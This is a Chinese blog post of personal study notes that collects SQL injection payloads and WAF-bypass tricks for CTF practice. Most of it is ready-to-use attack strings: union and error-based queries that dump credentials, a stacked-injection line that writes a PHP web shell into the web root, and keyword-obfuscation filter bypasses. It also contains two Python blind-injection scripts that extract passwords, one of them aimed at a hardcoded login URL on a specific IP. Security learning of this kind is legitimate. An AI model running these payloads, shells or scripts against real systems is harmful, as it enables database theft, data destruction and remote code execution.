SQL注入和WAF绕过总结姿势

已于 2022-03-14 18:35:04 修改
阅读量4.6k 收藏 3
点赞数 1
分类专栏: web 文章标签: sql 数据库 web安全
于 2022-02-23 20:37:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51213906/article/details/123086942
版权

自己复习专用,大佬勿喷

文章目录

前言

静下心来,学者大佬做点总结

一、注入手法

联合注入

当查询数据会返回显示界面时可以考虑使用union联合查询的方式
1,首先判断是否存在注入
2,然后用 order by 判断有几列数据

?id = 1' order by 3 %23

3,将id=1改为一个数据库不存在的id值,如-1,
使用union select 1,2,3联合查询语句查看页面是否有显示位。
4,然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息
数据库名

?id=-1' union select 1,2,database() %23

表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23

列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

字段

?id=-1' union select 1,2,group_concat(username,0x3a,password) from users--+

tip:0x3a 代表十六进制的 :

报错注入

什么场景下有用?

查询不回现内容,但会打印错误信息 Update、Insert等语句,
会打印错误信息(前面的union 不适合 update 语句)
在这里插入图片描述
floor()
SELECT count(*) from information_schema.TABLES GROUP BY concat((select version()),floor(rand(0)*2)) group by对rand()函数操作是产生了错误
extractvalue()
extractvalue(1,concat(0x7e,(select user()),0x7e)) xpath语法导致的错误
updatexml()
select updatexml(1,concat(0x7e,(select version()),0x7e),1) xpath语法导致的错误

1,爆数据库名:

?id=1' and extractvalue(1,concat(0x7e,(database()))) --+

2,爆表:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.

模板

查数据库名:
id='and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名:
id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆字段名:
id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

爆数据:
id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

来源文章
sql注入之报错注入
MySQL手注之报错注入详解

布尔盲注

应用场景
当一个页面,存在注入,没显示位,没有输出SQL语句执行错误信息,
只能通过页面返回正常不正常进行判断进行SQL注入。

常用到的:
left()函数
regexp
like
substr()函数
ascii()函数
ord()函数
mid()函数

这里引用一篇博客表格
在这里插入图片描述

延时注入

延时注入又称时间盲注,也是盲注的一种。
通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/

多用脚本达成数据获取

堆叠注入

顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,
使用分号结束上一个语句再叠加其他语句一起执行。

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在分号(;)结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。

例如以下这个例子。
用户输入:1; DELETE FROM products
服务器端生成的sql语句为:(因未对输入的参数进行过滤)

Select * from products where productid=1;DELETE FROM products

当执行查询后,第一条显示查询信息,第二条则将整个表进行删除
例子

id=1';show databases;#

经典题目
2019强网杯随便注
前面很常规就是用堆叠来查看库、表之类的,后面的查看flag操作就骚了
在这里插入图片描述
以下文章有三种解法,大佬tql随便注-三种解法
1.通过 alert 和 rename修改表名、列名来回显
2.预处理语句+堆叠注入
利用char()方法将ASCII码转换为SELECT字符串,接着利用concat()方法进行拼接获得查询的SQL语句,来绕过过滤或者直接使用concat()方法绕过
3.利用命令执行Getflag,这个最骚了,之前都没见过写shell进去的方法

1';Set @sql=concat("s","elect '<?php @print_r(`$_GET[1]`);?>' into outfile '/var/www/html/1",char(46),"php'");PREPARE sqla from @sql;EXECUTE sqla;

二、绕过姿势

绕过空格

参考文章SQL注入绕过技巧

注释符

注释符/* */,%a0

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

括号

在MySQL中,括号是用来包围子查询的。
因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。

比如

select(user())from dual where(1=1)and(2=2)

在注入时

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

引号绕过(使用十六进制)

在这里插入图片描述
这个时候如果引号被过滤了,那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。
  users的十六进制的字符串是7573657273。那么最后的sql语句就变为了:

select column_name  from information_schema.tables where table_name=0x7573657273

逗号绕过(使用from或者offset)

场景
在使用盲注的时候,需要使用到substr(),mid(),limit。
这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from for的方式来解决

举例子
比如sql靶场中的盲注是这样的

' and ascii(substr((select database()),1,1))=xx %23

如果过滤了逗号可以这样写

' and ascii(substr((select database())from 1 for 1))=xx %23

绕过union,select,where等

1.注释符绕过

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

2.大小写绕过

id=-1'UnIoN/**/SeLeCT

3.内联注释绕过

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

4.双写绕过

id=-1'UNIunionONSeLselectECT1,2,3–-

。。。。。。

三、SQL盲注脚本

脚本请根据题目具体情况修改

二分法

import requests
def SQLinject():
    # url是随时更新的,具体的以做题时候的为准
    url = ''
    # url = 'http://www.sql.com/login.php'
    data = {"name": "",
            "password": "123"
            }
    flag = ''
    i = 1

    while True:
        # 从可打印字符开始
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            # print(begin, mid, end)
            # data["name"] = "admin' anandd iiff((ascii(substr((Select group_concat(table_name) from infoorrmation_schema.tables Where table_schema='ctf'),{0},1))>{1}),1,0)#".format(i, mid)
            # data["name"] = "admin' anandd iiff((ascii(substr((Select group_concat(column_name) from infoorrmation_schema.columns Where table_name='admin'),{0},1))>{1}),1,0) anandd '1".format(i, mid)
            data["name"] = "admin'/**/anandd/**/iiff((ascii(substr((Select/**/group_concat(USER,':',PASSWOORRD)/**/from/**/admin),{0},1))>{1}),1,0)/**/anandd/**/'1".format(i, mid)
            # time_start = time.time()
            r = requests.post(url, data=data)
            # time_end = time.time()
            # all_time = time_end - time_start
            # print(r.text)
            if "用户不存在!" in r.text:
                # print(111)
                end = mid
                tmp = (begin + end) // 2
                mid = tmp
            else:
                begin = mid + 1
                tmp = (begin + end) // 2
                mid = tmp
        # print(mid)
        flag += chr(mid)
        i += 1
        print(flag)


if __name__ == "__main__":
    SQLinject()

普通脚本

# coding:utf-8
import requests
import datetime
import time

# 获取数据库名长度


def database_len():
    for j in range(1,40):
        for i in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRESTUVWXYZ':
            payload = "admin'/**/anandd/**/iiff((substr(database(),%d,1)='%s'),ssleepleep(2),1)/**/anandd'1'='1" % (j,i)
            url = '''http://47.97.203.129:5000/login.php'''
            data = {'name': payload, "password": '123'}
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.post(url=url,data=data)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                print(i)
            else:
                print(i)
                break
    print('database_len:', i)


#database_len()


#获取数据库名
def database_name():
    name = ''

    for j in range(1, 40):
        for i in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRESTUVWXYZ':
            payload = "admin'/**/anandd/**/iiff(substr((selecT/**/passwoorrd/**/from/**/ctf.admin),%d,1)='%c',slesleepep(3),1)/**/anandd'1'='1"%(j, i)
            data = {'name': payload, "password": '123'}
            url = '''http://47.97.203.129:5000/login.php'''
            #payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.post(url=url,data=data)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 3:
                name += i
                print(name)
                break
    print('database_name:', name)



database_name()

总结

参考文章

SQL注入的几种类型和原理
基本的四种SQL注入方式

4v1d
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入常用WAF绕过姿势
oldbuger的博客
08-11 2388
一、什么是WAF 1、简介 WAF部署在web应用程序前面,在用户请求到达web服务器前对用户请求进行扫描和过滤,分析并校验每个用户请求的网络包,确保每个用户请求有效且安全,对无效或有攻击行为的请求进行阻断或隔离。通过检查HTTP流量,可以防止源自web应用程序的安全漏洞(如SQL注入,跨站脚本攻击,文件包含和安全配置错误)的攻击。 2、工作原理 检测异常协议:拒绝不符合HTTP标准的请求 增强型的输入验证:代理和服务器端验证,而不仅仅是客户端验证 白名单和黑名单 基于规则和异常的保护:基..
SQL注入WAF小结
05-08
自己总结SQL注入WAF小结,有人能指点指点就更好啦。。
SQL注入WAF总结
aiguang4476的博客
06-07 480
0x00 前言 在服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。从半年前的测试虚拟机里面,翻出了360主机卫士Apache版的安装包,就当做是一个纪念版吧。这边主要分享一下几种思路,Bypass 360主机卫士SQL注入防御。 0x01 环境搭建 360主机卫士官网:http://zhuji.360.c...
sql注入waf总结
qq_45746681的博客
10-07 682
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、环境搭建?二、方法1.内联注释(/*![12345]*/)绕过方法:2.第二种绕过方法,内联注释另类思想绕过3.第三种绕过方法,%0a绕过4.第四种绕过方法,特殊的URL编码绕过安全狗5.url另类传参绕过6.垃圾数据填充 前言 总结下自己常用的sql注入waf方法 一、环境搭建? windows 10 操作系统 1,phpstudy2016 2,安全狗最新版,(切记以管理员身份启动安全狗) 二、方法 1.内联注释(/!
sql注入waf
YouthBelief的博客
10-13 2667
sql注入waf 安全狗3.5 1.内联注释+5五位数+%23+%0a 绕过 ?id=1 union select 1,2,3; 会被拦截 经过测验 union select 函数被拦截 构造 /*!06447%23%0a*/select 即可绕过 安全狗4.0 ?id=1 union select 1,2,3; 会被拦截 3.5版本绕过方法 失败 payload union /*!--+/*%0a select /*!1,2,*/3 分析 union /*! --+/*%0a
SQL注入的一般方法总结(含WAF绕过) ctf
NLost
03-20 6847
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL注入常见绕过方法:以下以 **index.php?id=1** 为例绕过
sql注入绕过方法总结
12-19
sql注入绕过方法总结绕过waf,D盾
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAFWeb Application Firewall)的常见特征是指其具有审计...
SQL注入中的WAF绕过技术
08-03
SQL 注入中的 WAF 绕过技术有很多种,每种技术都有其特点和优缺点。攻击者可以根据实际情况选择合适的技术来绕过 WAF 检测。同时,防御方也可以根据这些技术来加强 WAF 的检测能力,提高安全性。
SQL注入总结(四)
yan_star的博客
08-07 707
WAF绕过:(web application firewall) 从架构层绕过waf 从资源角度绕过waf 从协议层面绕过waf 从规则缺陷绕过waf 1.从架构层绕过waf 1.1寻找源站 如果流量都没有经过waaf,waf当然无法拦截攻击请求。当前许多云waf架构,例如:百度云加速,360安全卫士等,通过更改DNS解析,把流量引入waf集群,流量经过检测后转发请求到源站 云wa...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
sql注入绕过方法
qq_53030229的博客
08-26 3207
一、大小写绕过 有时候,在我们执行sql注入过程中,代码对有些关键词进行过滤和替换,这时候我们可以利用更换大小写方式绕过sql语句可以识别大小写。 执行下来效果还是一样的。 二、双写绕过 在我们进行注入时候,有时候会遇到把关键词进行直接替换为空或者删除的注入,这时候,相当于你的注入语句就直接失效了,这个时候我们就可以使用双写绕过。 三、编码绕过 使用URL编码对输入语句进行加密,然后服务器端会对其进行解密。 四、内联注释绕过 在mysql中,内联注释绕过的语句会被当做sql语句执行。 替换位置也
实战 WAF-Bypass之SQL注入绕过思路总结
dzqxwzoe的博客
12-01 1142
WAF攻防研究之四个层次Bypass WAF那些可以绕过WAF的各种特性waf从入门到Bypasshttp://github.wh0ale.xyz/2019/12/04/waf从入门到Bypass/干货|各种WAF绕过手法学习利用分块传输绕WAF技术讨论 | 在HTTP协议层面绕过WAF
SQL注入之堆叠及WAF绕过注入
av11566的博客
04-21 4542
前言 在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF绕过,而绕过WAF前肯定需要对WAF的工作原理有一定的理解。 所需知识 1. 堆叠查询注入 定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实 的运用中也是这样的,我们知道在mysql中,主要是命令行中,每
手工sql注入&&绕过waf &&一个实例分析
蚁景网安学院
09-28 817
这篇文章,将教大家基本的手工sql注入绕过waf的知识;分享一个实例,为了效果建议读者自己去搭建环境,因为真实环境都不怎么理想。1.sql注入的基础2.sql注入绕过waf3. s...
sql注入——避开过滤
weixin_34072637的博客
09-19 257
有的时候,很容易受到SQL注入***的程序,可能会进行输入过滤,用来防止***者无限制的利用其中存在的设计缺陷。 唱出会删除或者净化一些字符,或者阻止常用的sql关键词。 我们通常有以下几种技巧,去避开这些过滤。 1,避免使用被阻止的字符,即不使用这些字符仍然达到***目的。 A,如果注入一个数字数据字段,就不需要使用单引号。 B,输入注释符号被阻止使用,我们可以设...
SQL注入WAF绕过
热门推荐
xdjxi的博客
03-14 1万+
SQL注入WAF绕过的基本方法 WAF绕过 WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“绕过WAF”就是指通过某种方式无视WAF安全策略,达到攻击的目的。 方法1:变换大小写 实例:比如WAF拦截了union,那就使用Union、UnloN等方式绕过。 方法2:编码 实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1 ,concat('~.
[转载]深入理解SQL注入绕过WAF和过滤机制
weixin_33991727的博客
06-27 1417
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异常输入直接发生重定向。之前对WAF并不太了解,因此趁此...
sql注入及其waf绕过
最新发布
06-07
为了防止SQL注入攻击和WAF绕过,开发人员应该采取以下措施: 1. 使用参数化查询或预处理语句来防止SQL注入攻击。 2. 对输入进行过滤和验证,以防止恶意输入。 3. 对敏感数据进行加密和哈希处理。 4. 使用最新版本的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值